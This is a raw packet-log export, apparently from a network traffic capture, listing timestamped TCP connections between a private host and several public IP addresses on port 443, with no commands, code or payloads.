                                                                                                                  Oct 22, 2024 16:08:23.342489004 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.411190033 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.411273003 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.424252033 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.424335957 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.458703041 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.458767891 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.459059000 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.459136009 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.504873037 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.504930973 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.528121948 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.528194904 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.541049957 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.541151047 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.575440884 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.575506926 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.595005989 CEST44349727104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.595072031 CEST49727443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.595088959 CEST44349727104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.595103025 CEST44349727104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.595180035 CEST49727443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.595180988 CEST49727443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.595201015 CEST49727443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.616575003 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.616633892 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.621953964 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.622015953 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.645087004 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.645150900 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.645169973 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.645196915 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.645255089 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.645262957 CEST44349730104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.645332098 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.645344973 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.645394087 CEST49730443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.647695065 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.647732973 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.647845984 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.648030043 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:23.648046970 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.765341997 CEST4968080192.168.2.16192.229.211.108
                                                                                                                  Oct 22, 2024 16:08:23.789915085 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.790211916 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.790230036 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.791263103 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.791328907 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.792474031 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.792531967 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.792876959 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.835333109 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.843759060 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.843792915 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.844316959 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.844351053 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.844352961 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.844561100 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:23.844572067 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.892322063 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.935527086 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.935856104 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.935904026 CEST4434973435.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.936013937 CEST49734443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.936439991 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.936491966 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.936566114 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.936777115 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:23.936789036 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.252331018 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.252636909 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.252660990 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.253016949 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.253443003 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.253499031 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.253880978 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.299326897 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.396111965 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.396184921 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.396238089 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.397172928 CEST49735443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.397200108 CEST44349735104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.461369991 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.461709023 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.461720943 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.462040901 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.462426901 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.462486982 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.462590933 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.507323980 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.555356026 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.555619955 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.555648088 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.556674004 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.556740999 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.557020903 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.557070017 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.557146072 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.557152987 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.607399940 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.607464075 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.607528925 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.608330965 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.608798027 CEST49736443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.608809948 CEST44349736104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.611293077 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.611356974 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.611427069 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.611625910 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:24.611638069 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.703052998 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.703365088 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.703402042 CEST4434973735.190.80.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.703459978 CEST49737443192.168.2.1635.190.80.1
                                                                                                                  Oct 22, 2024 16:08:24.840558052 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.840614080 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:24.840792894 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.840989113 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:24.841001034 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.215384960 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.217365980 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:25.217395067 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.217786074 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.218700886 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:25.218769073 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.218882084 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:25.259325981 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.357279062 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.357355118 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.357405901 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:25.359045029 CEST49738443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:25.359064102 CEST44349738104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.458117008 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.458370924 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.458384991 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.458708048 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.459041119 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.459091902 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.459192038 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.499330997 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.598884106 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.598956108 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.599021912 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.599024057 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.599069118 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.600302935 CEST49739443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.600325108 CEST44349739104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.842209101 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.842264891 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:25.842407942 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.842638016 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:25.842652082 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.169318914 CEST4968080192.168.2.16192.229.211.108
                                                                                                                  Oct 22, 2024 16:08:26.442842007 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.443238020 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.443268061 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.443614006 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.444088936 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.444139957 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.444247961 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.488311052 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.488328934 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.504379034 CEST49678443192.168.2.1620.189.173.10
                                                                                                                  Oct 22, 2024 16:08:26.584765911 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.584834099 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.584883928 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.586218119 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.586261988 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.586270094 CEST49741443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.586292028 CEST44349741104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:26.586360931 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.586843967 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:26.586858034 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.192190886 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.192913055 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.192928076 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.193278074 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.194989920 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.195060015 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.195189953 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.234390020 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.234405994 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.333949089 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.334027052 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.334381104 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.335586071 CEST49742443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.335601091 CEST44349742104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.812422991 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.812465906 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.812558889 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.812818050 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:27.812834024 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:27.967358112 CEST49673443192.168.2.16204.79.197.203
                                                                                                                  Oct 22, 2024 16:08:28.433543921 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.433909893 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.433923960 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.434294939 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.434751034 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.434804916 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.434811115 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.434842110 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.434864044 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.434879065 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.434895039 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.443356991 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.443386078 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.750744104 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.751108885 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.751204014 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.751219034 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.751701117 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.751804113 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.751811981 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.753449917 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.753480911 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.753509998 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.753530025 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.753535986 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.753566980 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.806406975 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.806421995 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.854342937 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.868690014 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.869714022 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.869752884 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.869782925 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.869797945 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.869836092 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.870345116 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.870919943 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.870976925 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.870984077 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912271023 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912374973 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.912389040 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912431955 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912472010 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.912477970 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912530899 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.912569046 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.912642956 CEST49744443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:28.912659883 CEST44349744104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.915752888 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:28.915803909 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:28.915869951 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:28.916127920 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:28.916146040 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.458925009 CEST44349719172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.458997011 CEST44349719172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.459053993 CEST49719443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:29.521356106 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.521739006 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:29.521764040 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.522108078 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.522464991 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:29.522521019 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.522646904 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:29.563333988 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.663710117 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.663908005 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:29.663999081 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:29.664403915 CEST49745443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:29.664443016 CEST44349745104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:30.051218987 CEST49719443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:30.051243067 CEST44349719172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:30.973354101 CEST4968080192.168.2.16192.229.211.108
                                                                                                                  Oct 22, 2024 16:08:31.161567926 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.161611080 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.161902905 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.161902905 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.161935091 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.784121990 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.784492016 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.784524918 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.784877062 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.785298109 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.785373926 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.785446882 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.785448074 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.785475016 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.785490036 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:31.785592079 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:31.785630941 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122303963 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122384071 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122562885 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122561932 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:32.122607946 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122706890 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:32.122761965 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122840881 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.122886896 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:32.123585939 CEST49747443192.168.2.16104.18.94.41
                                                                                                                  Oct 22, 2024 16:08:32.123606920 CEST44349747104.18.94.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.136714935 CEST49749443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.136760950 CEST44349749188.114.97.3192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.136840105 CEST49749443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.137015104 CEST49750443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.137116909 CEST44349750188.114.97.3192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.137187958 CEST49750443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.137610912 CEST49749443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.137624025 CEST44349749188.114.97.3192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.137834072 CEST49750443192.168.2.16188.114.97.3
                                                                                                                  Oct 22, 2024 16:08:32.137883902 CEST44349750188.114.97.3192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.140248060 CEST49751443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:32.140304089 CEST44349751104.18.95.41192.168.2.16
